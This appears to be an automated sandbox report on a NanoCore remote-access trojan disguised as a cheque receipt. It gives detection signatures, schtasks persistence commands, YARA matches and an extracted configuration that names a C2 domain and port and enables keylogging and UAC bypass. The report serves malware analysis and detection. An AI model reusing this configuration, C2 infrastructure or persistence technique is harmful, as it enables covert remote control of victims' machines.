Play interactive tour

Edit tour

Analysis Report CHEQUE COPY RECEIPT.exe

Overview

General Information

Sample Name:	CHEQUE COPY RECEIPT.exe
Analysis ID:	355858
MD5:	403180100f3d966d4ea44c84d039a6d0
SHA1:	4b1af3fd502ad953024cb152c5a6d472fd0307c7
SHA256:	18ca07a540dbd6da66851f88c11ad7683486e33f5c2512fe5c4837c44f8f4bc3
Tags:	exeNanoCoreRAT
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Nanocore RAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

CHEQUE COPY RECEIPT.exe (PID: 3888 cmdline: 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' MD5: 403180100F3D966D4EA44C84D039A6D0)

CHEQUE COPY RECEIPT.exe (PID: 3060 cmdline: 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' MD5: 403180100F3D966D4EA44C84D039A6D0)

schtasks.exe (PID: 4616 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5856 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

CHEQUE COPY RECEIPT.exe (PID: 5364 cmdline: 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0 MD5: 403180100F3D966D4EA44C84D039A6D0)

CHEQUE COPY RECEIPT.exe (PID: 1060 cmdline: 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0 MD5: 403180100F3D966D4EA44C84D039A6D0)

dhcpmon.exe (PID: 5312 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 403180100F3D966D4EA44C84D039A6D0)

dhcpmon.exe (PID: 6316 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 403180100F3D966D4EA44C84D039A6D0)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bed38ea9-13ae-4999-bfd6-9ec5f9de3405", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43195:$a: NanoCore 0x431ee:$a: NanoCore 0x4322b:$a: NanoCore 0x432a4:$a: NanoCore 0x5694f:$a: NanoCore 0x56964:$a: NanoCore 0x56999:$a: NanoCore 0x6f95b:$a: NanoCore 0x6f970:$a: NanoCore 0x6f9a5:$a: NanoCore 0x431f7:$b: ClientPlugin 0x43234:$b: ClientPlugin 0x43b32:$b: ClientPlugin 0x43b3f:$b: ClientPlugin 0x5670b:$b: ClientPlugin 0x56726:$b: ClientPlugin 0x56756:$b: ClientPlugin 0x5696d:$b: ClientPlugin 0x569a2:$b: ClientPlugin 0x6f717:$b: ClientPlugin 0x6f732:$b: ClientPlugin
00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.282706630.00000000022F0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1c813:$a: NanoCore 0x1c86c:$a: NanoCore 0x1c8a9:$a: NanoCore 0x1c922:$a: NanoCore 0x1c875:$b: ClientPlugin 0x1c8b2:$b: ClientPlugin 0x1d1b0:$b: ClientPlugin 0x1d1bd:$b: ClientPlugin 0x12997:$e: KeepAlive 0x1ccfd:$g: LogClientMessage 0x1cc7d:$i: get_Connected 0xcc49:$j: #=q 0xcc79:$j: #=q 0xccb5:$j: #=q 0xccdd:$j: #=q 0xcd0d:$j: #=q 0xcd3d:$j: #=q 0xcd6d:$j: #=q 0xcd9d:$j: #=q 0xcdb9:$j: #=q 0xcde9:$j: #=q
0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2b405:$x1: NanoCore.ClientPluginHost 0x2b442:$x2: IClientNetworkHost 0x2ef75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2b16d:$a: NanoCore 0x2b17d:$a: NanoCore 0x2b3b1:$a: NanoCore 0x2b3c5:$a: NanoCore 0x2b405:$a: NanoCore 0x2b1cc:$b: ClientPlugin 0x2b3ce:$b: ClientPlugin 0x2b40e:$b: ClientPlugin 0x675b0:$b: ClientPlugin 0x6e1ce:$b: ClientPlugin 0x2b2f3:$c: ProjectData 0x2bcfa:$d: DESCrypto 0x336c6:$e: KeepAlive 0x316b4:$g: LogClientMessage 0x2d8af:$i: get_Connected 0x2c030:$j: #=q 0x2c060:$j: #=q 0x2c07c:$j: #=q 0x2c0ac:$j: #=q 0x2c0c8:$j: #=q 0x2c0e4:$j: #=q
00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x172cd:$x1: NanoCore.ClientPluginHost 0x1730a:$x2: IClientNetworkHost 0x1ae3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x17035:$a: NanoCore 0x17045:$a: NanoCore 0x17279:$a: NanoCore 0x1728d:$a: NanoCore 0x172cd:$a: NanoCore 0x17094:$b: ClientPlugin 0x17296:$b: ClientPlugin 0x172d6:$b: ClientPlugin 0x171bb:$c: ProjectData 0x17bc2:$d: DESCrypto 0x1f58e:$e: KeepAlive 0x1d57c:$g: LogClientMessage 0x19777:$i: get_Connected 0x17ef8:$j: #=q 0x17f28:$j: #=q 0x17f44:$j: #=q 0x17f74:$j: #=q 0x17f90:$j: #=q 0x17fac:$j: #=q 0x17fdc:$j: #=q 0x17ff8:$j: #=q
00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x129ed9:$x1: NanoCore.ClientPluginHost 0x129f3a:$x2: IClientNetworkHost 0x12f33f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x13d2b1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
